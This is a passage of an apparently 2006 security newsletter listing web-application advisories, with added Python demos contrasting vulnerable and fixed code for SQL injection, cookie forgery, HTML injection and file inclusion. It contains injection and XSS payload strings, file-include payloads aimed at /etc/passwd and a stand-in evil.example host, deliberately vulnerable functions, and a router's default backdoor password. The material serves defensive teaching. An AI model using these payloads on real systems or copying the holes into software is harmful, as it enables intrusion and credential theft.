  • Ref: http://www.securityfocus.com/bid/16815

  • 06.9.43 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: TMSPublisher Search.CFM Cross-Site Scripting
  • Description: tmsPublisher is a web-based content management system implemented in ColdFusion. Insufficient sanitization of the "search.cfm" script exposes the application to a cross-site scripting issue.
  • Ref: http://www.securityfocus.com/bid/16816

  • 06.9.44 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: EZ Publish ImageCatalogue Cross-Site Scripting
  • Description: eZ Publish is a web-based content management system. Insufficient sanitization of the "RefererURL" parameter in the "imagecatalogue" module exposes the application to a cross-site scripting issue.
  • Ref: http://www.securityfocus.com/bid/16817

  • 06.9.45 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: bttlxeForum Failure.ASP Cross-Site Scripting Vulnerability
  • Description: bttlxeForum is a web forum application. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "err_txt" parameter of the "failure.asp" script. Battleaxe Software bttlxeForum version 2.0 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/16821

  • 06.9.46 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Thomson SpeedTouch 500 Series Cross-Site Scripting
  • Description: The SpeedTouch 500 series are ADSL modems that have a built-in web interface for configuration. The SpeedTouch 500 series are prone to a cross-site scripting vulnerability. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site.
  • Ref: http://www.securityfocus.com/archive/1/426186

  • 06.9.47 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Fantastic Scripts Fantastic News SQL Injection
  • Description: Fantastic News is a web-based bulletin board written in PHP. It is prone to an SQL injection vulnerability. Fantastic News version 2.1.1 is affected.
  • Ref: http://www.securityfocus.com/archive/1/426195

  • 06.9.48 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Woltlab Burning Board Multiple Cross-Site Scripting Vulnerabilities
  • Description: Woltlab Burning Board is a web-based bulletin board package. It is vulnerable to multiple cross-site scripting issues due to insufficient sanitization of user-supplied input to the "username" parameter of the "galerie_index.php" script and the "inpic" parameter of the "galerie_onfly.php" script. Woltlab Burning Board versions 2.7 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/bid/16843

  • 06.9.49 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: iCal Calendar Text Cross-Site Scripting
  • Description: Brown Bear Software iCal is a web-based calendar application. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "Calendar Text" parameter. Brown Bear Software iCal version 3.10 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/16845/info

  • 06.9.50 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: EJ3 TOPo Inc_header.PHP Cross-Site Scripting
  • Description: EJ3 TOPo is a topsite ranking application implemented in PHP. EJ3 TOPo is prone to a cross-site scripting vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input to the "gTopNomBer" parameter of the "inc_header.php" script. EJ3 TOPo version 2.2.178 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/426318

  • 06.9.51 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: PEHEPE Membership Management System Cross-Site Scripting
  • Description: PEHEPE Membership Management System is a member directory application. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "kul_adi" parameter of the "sol_menu.php" script. PEHEPE Membership Management System version 3 is vulnerable.
  • Ref: http://yns.zaxaz.com/2006/02/

  • 06.9.52 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: PunBB Header.PHP Cross-Site Scripting
  • Description: PunBB is a bulletin board application written in PHP. It is prone to a cross-site scripting vulnerability. PunBB version 1.2.10 is vulnerable.
  • Ref: http://www.punbb.org/changelogs/1.2.10_to_1.2.11.txt

  • 06.9.53 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: AddSoft StoreBot Manage.ASP Cross-Site Scripting
  • Description: StoreBot is web-based shopping cart software implemented in ASP. StoreBot is prone to a cross-site scripting vulnerability. AddSoft StoreBot 2002 Standard Edition is vulnerable.
  • Ref: http://www.securityfocus.com/bid/16898

  • 06.9.54 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Fantastic Scripts Fantastic ID Parameter SQL Injection
  • Description: Fantastic News is a web-based bulletin board. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "id" parameter of the "news.php" script. Fantastic News version 2.1.1 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/16860

  • 06.9.55 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: D3Jeeb Multiple SQL Injection Vulnerabilities
  • Description: D3Jeeb is a web application. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the "catid" parameter of "fastlinks.php" and "catogary.php" scripts. D3Jeeb Pro version 3 is vulnerable.
  • Ref: http://secunia.com/advisories/19062/

  • 06.9.56 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Cilem News Unspecified SQL Injection
  • Description: Cilem News is a news-related web application with a database back end. Cilem News is prone to an unspecified SQL injection vulnerability. Cilem News versions 1.1 and 1.0 are vulnerable.
  • Ref: http://www.securityfocus.com/bid/16813

  • 06.9.57 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Pentacle In-Out Board Multiple SQL Injection Vulnerabilities
  • Description: Pentacle In-Out Board is a web-based bulletin board application. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the "password" parameter of the "login.asp" script, and the "newsid" parameter of the "newsdetailsview.asp" script. Pentacle In-Out Board version 6.03 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/16818

  • 06.9.58 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: phpWebSite Topics.PHP SQL Injection
  • Description: phpWebSite is a content management system implemented in PHP. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "topic" parameter of the "topics.php" script. phpWebSite versions 0.10.2 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/16825

  • 06.9.59 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: DCI-Taskeen Multiple SQL Injection Vulnerabilities
  • Description: DCI-Taskeen is a web-based application. Insufficient sanitization of the "id" and "action" parameters of the "basket.php" script and the "id" and "page" parameters of the "cat.php" script exposes the application to multiple SQL injection issues.
  • Ref: http://www.securityfocus.com/bid/16828

  • 06.9.60 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: PHP-Nuke Mainfile.PHP SQL Injection
  • Description: PHP-Nuke is a web-based content management application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "mainfile.php" script. PHP-Nuke version 7.8 is vulnerable.
  • Ref: http://www.waraxe.us/advisory-47.html

  • 06.9.61 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Lansuite Board Module SQL Injection
  • Description: Lansuite is a Lanparty administration application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "fid" parameter of the Board module. Lansuite version 2.1.0 Beta is vulnerable.
  • Ref: http://milw0rm.com/id.php?id=1526 http://secunia.com/advisories/19048/

  • 06.9.62 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: AddSoft StoreBot MgrLogin.ASP SQL Injection
  • Description: StoreBot is web-based shopping cart software. It is prone to an SQL injection vulnerability due to improper sanitization of user-supplied input to the "Pwd" parameter of the "MgrLogin.asp" script. AddSoft StoreBot 2005 Professional Edition is vulnerable.
  • Ref: http://www.securityfocus.com/bid/16897

  • 06.9.63 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Sendcard Multiple Unspecified SQL Injection Vulnerabilities
  • Description: Sendcard is a web-based application for the creation and sending of e-cards. Insufficient sanitization of user-supplied input exposes the application to an SQL injection issue. Sendcard versions 3.3.0 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/16900

  • 06.9.64 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: DCI-Designs Dawaween Poems.PHP SQL Injection
  • Description: DCI-Designs Dawaween is a web application implemented in PHP. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "id" parameter of the "poems.php" script. Dawaween version 1.03 is reportedly affected.
  • Ref: http://www.securityfocus.com/bid/16909

  • 06.9.65 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Woltlab Burning Board Multiple SQL Injection Vulnerabilities
  • Description: Woltlab Burning Board is a bulletin board application. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the "fileid" parameter of the "info_db.php" and "database.php" scripts. Woltlab Burning Board versions 2.7 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/426583

  • 06.9.66 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: PluggedOut Nexus forgotten_password.PHP SQL Injection
  • Description: PluggedOut Nexus is a web-based community application. It is prone to an SQL injection vulnerability due to improper sanitization of user-supplied input to the "forgotten_password.php" script. Nexus version 0.1 is reported to be affected.
  • Ref: http://www.securityfocus.com/bid/16915/exploit

  • 06.9.67 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: VUBB Index.PHP SQL Injection
  • Description: VUBB is an interactive forum application, written in PHP. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "pass" cookie parameter in the "index.php" script. VUBB version 0.2 is vulnerable.
  • Ref: http://milw0rm.com/id.php?id=1543
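
The login-form and cookie SQL injections above (06.9.57 "password" in login.asp, 06.9.62 "Pwd" in MgrLogin.asp, 06.9.67 "pass" cookie in index.php) all come from the same pattern: the credential is concatenated into the SQL text, so a quote character in the value ends the string literal and the rest is parsed as SQL. The following Python/sqlite3 script is an added illustration, not code from any of the products named in this bulletin; the table name, the stored row and the two query functions are constructed for the demo. It runs the classic tautology and comment payloads against the concatenating version and against a parameterized version of the same check.

```python
import sqlite3

# Constructed sample database: one manager row, in memory.
# Not the schema of any product in this bulletin. (Passwords are stored in
# clear here only to keep the example short; real code stores a salted hash.)
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE managers (username TEXT, pwd TEXT)")
    con.execute("INSERT INTO managers VALUES ('admin', 'correct horse')")
    return con

def login_vulnerable(con, username, pwd):
    """Builds the statement by string formatting, the pattern behind the
    login-parameter issues above. Returns the matched username or None."""
    sql = ("SELECT username FROM managers WHERE username = '%s' AND pwd = '%s'"
           % (username, pwd))
    row = con.execute(sql).fetchone()
    return row[0] if row else None

def login_fixed(con, username, pwd):
    """Same check with bound parameters: the engine receives the SQL text and
    the values separately, so a quote in the value never reaches the parser."""
    sql = "SELECT username FROM managers WHERE username = ? AND pwd = ?"
    row = con.execute(sql, (username, pwd)).fetchone()
    return row[0] if row else None

# Two payloads of the kind these advisories describe:
#  - TAUTOLOGY closes the pwd literal and appends an always-true clause:
#      ... AND pwd = '' OR '1'='1'
#  - COMMENT closes the username literal and comments out the password test:
#      ... WHERE username = 'admin'--' AND pwd = 'x'
TAUTOLOGY = "' OR '1'='1"
COMMENT_USER = "admin'--"

def demo():
    con = make_db()
    return {
        "vuln_legit":      login_vulnerable(con, "admin", "correct horse"),
        "vuln_wrong":      login_vulnerable(con, "admin", "wrong"),
        "vuln_tautology":  login_vulnerable(con, "admin", TAUTOLOGY),
        "vuln_comment":    login_vulnerable(con, COMMENT_USER, "x"),
        "fixed_legit":     login_fixed(con, "admin", "correct horse"),
        "fixed_tautology": login_fixed(con, "admin", TAUTOLOGY),
        "fixed_comment":   login_fixed(con, COMMENT_USER, "x"),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:16s} -> {result!r}")
```

Both payloads log the attacker in as "admin" through the concatenating query and fail through the parameterized one. For the cookie case (06.9.67) the only difference is where the value comes from; a cookie is as attacker-controlled as a form field and needs the same treatment.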

  • 06.9.68 - CVE: CVE-2005-3638
  • Platform: Web Application
  • Title: EKINboard Multiple Input Validation Vulnerabilities
  • Description: EKINboard is a web-based forum application. It is vulnerable to multiple input validation issues due to insufficient sanitization of the user-supplied input. Issues include SQL injections and cross-site scripting. EKINboard version 1.0.3 is vulnerable.
  • Ref: http://secunia.com/advisories/19045/

  • 06.9.69 - CVE: Not Available
  • Platform: Web Application
  • Title: n8cms Multiple Input Validation Vulnerabilities
  • Description: n8cms is a web-based content management system implemented in PHP. It is prone to multiple input validation vulnerabilities due to insufficient sanitization of user-supplied input. n8cms versions 1.2 and 1.1 are affected.
  • Ref: http://www.securityfocus.com/bid/16858

  • 06.9.70 - CVE: Not Available
  • Platform: Web Application
  • Title: ShoutLIVE Multiple Input Validation Vulnerabilities
  • Description: ShoutLIVE is affected by multiple input validation issues that result in script code injection. ShoutLIVE version 1.1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/16857

  • 06.9.71 - CVE: Not Available
  • Platform: Web Application
  • Title: 4images Index.PHP Remote File Include
  • Description: 4images is an image gallery management application. It is vulnerable to a remote file include issue due to insufficient sanitization of user-supplied input to the "template" parameter of the "index.php" script. 4images version 1.7.1 is vulnerable.
  • Ref: http://milw0rm.com/id.php?id=1533

  • 06.9.72 - CVE: Not Available
  • Platform: Web Application
  • Title: Archangel Weblog Authentication Bypass
  • Description: Archangel Weblog is web-based blog software implemented in PHP utilizing a MySQL backend. It is prone to an authentication bypass vulnerability due to improper validation of user-supplied cookie data. Archangel Weblog version 0.90.2 is affected.
  • Ref: http://www.securityfocus.com/bid/16848/exploit
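
Cookie-based authentication bypasses of the kind reported for Archangel Weblog (06.9.72) arise when the application stores its authorization decision in the cookie and reads it back without any integrity check, so the user can simply edit the value. The Python below is an added example, not Archangel's code: the cookie layout, the field separator and the secret are assumptions made for the demo. It shows a cookie that carries an "admin" flag in the clear beside one whose payload is protected by an HMAC and an expiry, and a forgery attempt against each.

```python
import base64
import hashlib
import hmac
import time

# Assumed server-side secret. In practice it is random, loaded from
# configuration, and never sent to the client.
SECRET = b"example-only-secret-change-me"
TTL_SECONDS = 3600

# --- vulnerable scheme: state lives in the cookie and is believed verbatim ---
def set_cookie_vulnerable(username, is_admin):
    return f"user={username}; admin={int(is_admin)}"

def is_admin_vulnerable(cookie):
    fields = dict(kv.split("=", 1) for kv in cookie.split("; "))
    return fields.get("admin") == "1"

# --- fixed scheme: payload|HMAC, verified before any field is trusted ---
def _mac(payload: bytes) -> bytes:
    return hmac.new(SECRET, payload, hashlib.sha256).digest()

def set_cookie_fixed(username, is_admin, now=None):
    # Assumed payload format "user|adminflag|expiry"; usernames here contain no '|'.
    exp = int(now if now is not None else time.time()) + TTL_SECONDS
    payload = f"{username}|{int(is_admin)}|{exp}".encode()
    return (base64.urlsafe_b64encode(payload).decode() + "."
            + base64.urlsafe_b64encode(_mac(payload)).decode())

def verify_fixed(cookie, now=None):
    """Return {'user', 'admin'} for a valid, unexpired cookie, else None."""
    try:
        p64, m64 = cookie.split(".", 1)
        payload = base64.urlsafe_b64decode(p64)
        mac = base64.urlsafe_b64decode(m64)
        # Constant-time comparison; only then parse the payload.
        if not hmac.compare_digest(mac, _mac(payload)):
            return None
        username, admin, exp = payload.decode().split("|")
        if int(exp) < int(now if now is not None else time.time()):
            return None
    except ValueError:          # bad base64, wrong field count, bad int, bad UTF-8
        return None
    return {"user": username, "admin": admin == "1"}

def forge_admin(cookie):
    """What an attacker can do to the signed cookie: flip the flag in the
    payload and keep the original MAC. verify_fixed must reject this."""
    p64, m64 = cookie.split(".", 1)
    payload = base64.urlsafe_b64decode(p64).decode().replace("|0|", "|1|").encode()
    return base64.urlsafe_b64encode(payload).decode() + "." + m64

if __name__ == "__main__":
    print("vulnerable, edited by user:", is_admin_vulnerable("user=alice; admin=1"))
    c = set_cookie_fixed("alice", False, now=1000)
    print("signed, genuine:", verify_fixed(c, now=1000))
    print("signed, forged :", verify_fixed(forge_admin(c), now=1000))
    print("signed, expired:", verify_fixed(c, now=1000 + TTL_SECONDS + 1))
```

A server-side session store keyed by a random identifier is the simpler alternative and avoids putting any claims in the cookie at all; the signed-payload form above is for applications that want to stay stateless. Either way, the rule the vulnerable scheme breaks is that a value the client can rewrite is never an authorization decision.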

  • 06.9.73 - CVE: Not Available
  • Platform: Web Application
  • Title: freeForum Remote PHP Script Code Injection
  • Description: freeForum is a forum application. Insufficient sanitization of the "X-Forwarded-For" and "Client-Ip" HTTP request headers in the "func.inc.php" script exposes the application to a PHP code injection issue. freeForum version 1.2 is affected.
  • Ref: http://www.securityfocus.com/bid/16871

  • 06.9.74 - CVE: Not Available
  • Platform: Web Application
  • Title: HP System Management Homepage Unspecified Directory Traversal
  • Description: HP System Management Homepage (SMH) provides a web-based management interface for ProLiant and Integrity servers. It is vulnerable to an unspecified directory traversal vulnerability when dealing with the "Lang" parameter of the ".namazurc" resource file. HP System Management Homepage versions 2.1.4 and earlier are vulnerable.
  • Ref: http://secunia.com/advisories/19059/

  • 06.9.75 - CVE: Not Available
  • Platform: Web Application
  • Title: DEV Web Management System HTML Injection
  • Description: DEV Web Management System is a content management application. It is prone to an HTML injection vulnerability due to insufficient sanitization of user-supplied input to the "City/Region" field on the account registration page. DEV Web Management System version 1.5 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/16812/references

  • 06.9.76 - CVE: Not Available
  • Platform: Web Application
  • Title: SPiD Scan_Lang_Insert.PHP Local File Include
  • Description: SPiD is a web-based gallery management application. It is prone to a local file include vulnerability due to improper sanitization of user-supplied input to the "lang" parameter of the "scan_lang_insert.php" script before using it in an "include()" call. SPiD version 1.3.1 is affected.
  • Ref: http://www.securityfocus.com/bid/16822/exploit

  • 06.9.77 - CVE: Not Available
  • Platform: Web Application
  • Title: FreeHostShop Website Generator Arbitrary File Upload
  • Description: Website Generator is a web-based content management system implemented in PHP. It is prone to an arbitrary file-upload vulnerability. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process.
  • Ref: http://www.securityfocus.com/archive/1/426077

  • 06.9.78 - CVE: Not Available
  • Platform: Web Application
  • Title: iGenus WebMail Config_Inc.PHP Remote File Include
  • Description: iGenus WebMail is a web email client application. It is vulnerable to a remote file include issue due to insufficient sanitization of user-supplied input to the "_SG_HOME" variable of the "config_inc.php" script. iGENUS WebMail versions 2.0.2 and earlier are vulnerable.
  • Ref: http://retrogod.altervista.org/igenus_202_xpl_pl.html

  • 06.9.79 - CVE: Not Available
  • Platform: Web Application
  • Title: Simple Machines X-Forwarded-For HTML Injection
  • Description: Simple Machines Forum (SMF) is a web forum application. Insufficient sanitization of the "X-Forwarded-For" header in the "Sources/Register.php" script exposes the application to an HTML injection issue. Simple Machines versions 1.0.6 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/16841

  • 06.9.80 - CVE: Not Available
  • Platform: Web Application
  • Title: freeForum Multiple HTML Injection Vulnerabilities
  • Description: freeForum is a forum application. It is vulnerable to multiple HTML injection issues due to insufficient sanitization of user-supplied input to the "name" and "subject" parameters of the "func.inc.php" script. freeForum version 1.2 is vulnerable.
  • Ref: http://soft.zoneo.net/freeForum/changes.php

  • 06.9.81 - CVE: Not Available
  • Platform: Web Application
  • Title: WordPress Multiple HTML Injection Vulnerabilities
  • Description: WordPress is a web-based publishing application. Insufficient sanitization of the "name" and "website" fields on the "post comment" page exposes the application to HTML injection issues. WordPress version 2.0.1 is affected.
  • Ref: http://www.securityfocus.com/bid/16880
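
The HTML injection entries here (06.9.80 freeForum "name" and "subject", 06.9.81 WordPress "name" and "website") and the cross-site scripting entries in the section above are the same defect seen from two angles: user text is written into a page without being encoded for the context it lands in. A comment author's "website" is a particularly instructive case because escaping alone is not enough; the value becomes an href, so a "javascript:" URL is a working payload even after every angle bracket is encoded. The Python below is an added example, not WordPress or freeForum code; the field names and the rendering template are assumptions for the demo. It shows the raw interpolation beside a version that escapes each field and allows only http(s) link targets.

```python
import html
from urllib.parse import urlsplit

def render_comment_vulnerable(name, website, body):
    """Raw interpolation: every field is a script-injection point."""
    return f'<p><a href="{website}">{name}</a> wrote: {body}</p>'

def safe_url(website):
    """Accept only absolute http(s) URLs as link targets. Rejects javascript:,
    data:, vbscript: and scheme-less values; returns None when rejected."""
    candidate = website.strip()
    parts = urlsplit(candidate)
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return None
    return candidate

def render_comment_fixed(name, website, body):
    """Escape for the HTML text and attribute contexts (quote=True handles the
    attribute case) and drop the link entirely if the URL fails the check."""
    esc = lambda s: html.escape(s, quote=True)
    author = esc(name)
    url = safe_url(website)
    if url is not None:
        author = f'<a href="{esc(url)}" rel="nofollow">{author}</a>'
    return f"<p>{author} wrote: {esc(body)}</p>"

# Constructed sample inputs of the kind the advisories describe.
SAMPLES = [
    ("<script>alert(1)</script>", "javascript:alert(2)", "hi"),
    ('" onmouseover="alert(3)', "http://example.com/?a=1&b=2", "x < y"),
    ("mallory", "data:text/html,<script>alert(4)</script>", "ok"),
]

if __name__ == "__main__":
    for name, site, body in SAMPLES:
        print("VULN :", render_comment_vulnerable(name, site, body))
        print("FIXED:", render_comment_fixed(name, site, body))
```

Encoding has to be chosen per output context: html.escape with quote=True covers element text and double-quoted attributes, but a value placed inside a script block, a CSS property or a URL query needs the encoder for that context instead. Rejecting non-http(s) schemes outright is simpler and safer than trying to blacklist "javascript:" spellings.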

  • 06.9.82 - CVE: Not Available
  • Platform: Web Application
  • Title: PEHEPE Membership Management System PHP Script Code Injection
  • Description: PEHEPE Membership Management System is a forum application. It is vulnerable to a remote PHP script code injection issue due to insufficient input sanitization of the "uye_klasor" parameter of the "sol_menu.php" script. PEHEPE Membership Management System version 3 is vulnerable.
  • Ref: http://yns.zaxaz.com/2006/02/28/pehepe-membership-management-system-multiple-vulnerabilities/

  • 06.9.83 - CVE: Not Available
  • Platform: Web Application
  • Title: Limbo CMS Frontpage Arbitrary PHP Command Execution
  • Description: Limbo CMS is a web-based content management system. It is prone to an arbitrary command execution vulnerability due to improper sanitization of user-supplied input to the "Itemid" parameter in the "index.php" script. Limbo CMS versions 1.0.4.2 and 1.0.4.1 are vulnerable.
  • Ref: http://www.securityfocus.com/bid/16902/exploit

  • 06.9.84 - CVE: Not Available
  • Platform: Web Application
  • Title: Issue Dealer Information Disclosure
  • Description: Issue Dealer is an issue tracking web application. It is vulnerable to an information disclosure issue because it allows remote attackers to guess URIs of unpublished content in a brute force manner. Issue Dealer versions 0.9.95 and earlier are vulnerable.
  • Ref: http://issuedealer.com/changes

  • 06.9.85 - CVE: Not Available
  • Platform: Web Application
  • Title: SMBlog Arbitrary PHP Command Execution
  • Description: SMBlog is a web log application. It is vulnerable to an arbitrary command execution issue due to insufficient sanitization of user-supplied input to the "pg" parameter of the "index.php" script. SMBlog version 1.2 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/426498

  • 06.9.86 - CVE: Not Available
  • Platform: Web Application
  • Title: UKiWEB UKiBoard FCE.PHP BBCode HTML Injection
  • Description: UKiWEB UKiBoard is a web-based bulletin board. It is prone to an HTML-injection vulnerability due to improper sanitization of user-supplied input to the "show_post()" function of the "fce.php" script. UKiBoard version 3.0.1 is vulnerable.
  • Ref: http://evuln.com/vulns/90/summary.html

  • 06.9.87 - CVE: Not Available
  • Platform: Web Application
  • Title: LogIT Remote File Include
  • Description: LogIT is a logging and statistics application written in PHP. It is prone to a remote file include vulnerability due to insufficient sanitization of user-supplied input to the "pg" URI parameter of the "index.php" script. LogIT versions 1.3 and 1.4 are affected by this vulnerability.
  • Ref: http://www.securityfocus.com/bid/16932
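
The file include entries in this issue (06.9.71 4images "template", 06.9.76 SPiD "lang", 06.9.78 iGenus "_SG_HOME", 06.9.87 LogIT "pg") describe one bug: a request parameter is concatenated into the argument of include() and the result is loaded as PHP. With "../" sequences the attacker reads or executes a local file; with allow_url_fopen/allow_url_include enabled, a URL pulls code from the attacker's server. The Python below is an added example that models the path resolution only, not any of these products' code, and does not execute anything; the include directory, the ".php" suffix convention and the language allowlist are assumptions made for the demo. It shows where the unchecked concatenation would send PHP for each payload and how an allowlist plus a containment check refuses them.

```python
import os

# Assumed application layout: language files live under LANG_DIR and the
# selector is appended to form "<LANG_DIR>/<lang>.php". Not from any product above.
LANG_DIR = "/var/www/app/lang"
ALLOWED_LANGS = frozenset({"en", "de", "fr"})

def include_path_vulnerable(lang):
    """Mirrors include($dir . '/' . $_GET['lang'] . '.php') with no check: the
    returned string is exactly what PHP would be told to open."""
    return LANG_DIR + "/" + lang + ".php"

def where_it_lands(lang):
    """The filesystem path the vulnerable concatenation resolves to once the
    kernel collapses '..' components."""
    return os.path.normpath(include_path_vulnerable(lang))

def include_path_fixed(lang):
    """Allowlist the selector, then confirm the normalised path is still under
    LANG_DIR. The second check is defence in depth; the first already rejects
    traversal, URLs and null bytes because none of them is an allowed token."""
    if lang not in ALLOWED_LANGS:
        raise ValueError(f"language selector not in allowlist: {lang!r}")
    path = os.path.normpath(os.path.join(LANG_DIR, lang + ".php"))
    if os.path.commonpath([LANG_DIR, path]) != LANG_DIR:
        raise ValueError(f"resolved include escapes {LANG_DIR}: {path}")
    return path

def classify(lang):
    """(what the vulnerable code would include, whether the fixed code accepts it)."""
    try:
        include_path_fixed(lang)
        accepted = True
    except ValueError:
        accepted = False
    return include_path_vulnerable(lang), accepted

# Constructed payloads of the kinds these advisories describe.
PAYLOADS = [
    "en",                                  # legitimate
    "../../../../etc/passwd",              # local file include / traversal
    "http://evil.example/shell.txt?",      # remote file include ('?' turns '.php' into a query string)
    "../../../../var/log/httpd/access_log\x00",  # old null-byte suffix truncation trick
]

if __name__ == "__main__":
    for p in PAYLOADS:
        target, ok = classify(p)
        print(f"{p!r:48s} vulnerable opens {target!r}; fixed accepts: {ok}")
```

The allowlist is what actually closes the hole: a free-form path check can be bypassed by encodings, by the null-byte truncation that older PHP releases (before 5.3.4) applied to file names, or by a URL that never touches the local filesystem, whereas a selector that must equal one of three known tokens has no room for any of that. Where the set of includable files is not fixed, map the parameter through a dictionary to a server-chosen path rather than building the path from the parameter.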

  • 06.9.88 - CVE: Not Available
  • Platform: Web Application
  • Title: NZ Ecommerce Multiple Input Validation Vulnerabilities
  • Description: NZ Ecommerce is a shopping cart system. The application is prone to multiple input validation vulnerabilities due to improper sanitization of user-supplied input. SQL injection attacks are possible through the "informationID" and "ParentCategory" parameters of "index.php". Cross-site scripting attacks are possible through the "action" parameter of "index.php". NZ Ecommerce System version 0 is affected.
  • Ref: http://www.securityfocus.com/bid/16931/exploit

  • 06.9.89 - CVE: Not Available
  • Platform: Network Device
  • Title: NuFW Remote TLS Connection Handling Denial of Service
  • Description: NuFW is a freely available, open source authenticating network application proxy firewall. It is susceptible to a remote Denial of Service vulnerability. This issue is due to a failure of the application to properly handle excessive authentication requests. NuFW versions prior to 1.0.21 are affected by this issue.
  • Ref: http://www.nufw.org/+NuFW-1-21-minor-security-fix+.html

  • 06.9.90 - CVE: CVE-2004-2556, CVE-2004-2557
  • Platform: Network Device
  • Title: Netgear WGT624 Wireless Access Point Default Backdoor Account
  • Description: Netgear WGT624 contains a default administrative account with a username of "Gearguy" and the password "Geardog". A remote attacker can gain complete access to a vulnerable access point by using the default credentials.
  • Ref: http://www.securityfocus.com/bid/16933

  • 06.9.91 - CVE: Not Available
  • Platform: Network Device
  • Title: Netgear WGT624 Wireless Firewall Router Information Disclosure
  • Description: NetGear WGT624 Wireless Firewall Router is a hardware appliance. It is vulnerable to information disclosure when the backup settings are enabled. The backup file contains authentication credentials in cleartext. NetGear model WGT624 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/426185

  • 06.9.92 - CVE: Not Available
  • Platform: Network Device
  • Title: Compex NetPassage WPE54G Denial Of Service
  • Description: NetPassage WPE54G is a wireless access point. It is prone to a remote denial of service vulnerability due to improper handling of user-supplied input. The problem occurs when the device receives malformed UDP packets to UDP port 7778.
  • Ref: http://www.securityfocus.com/bid/16894

(c) 2006. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

==end==

Subscriptions: @RISK is distributed free of charge to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.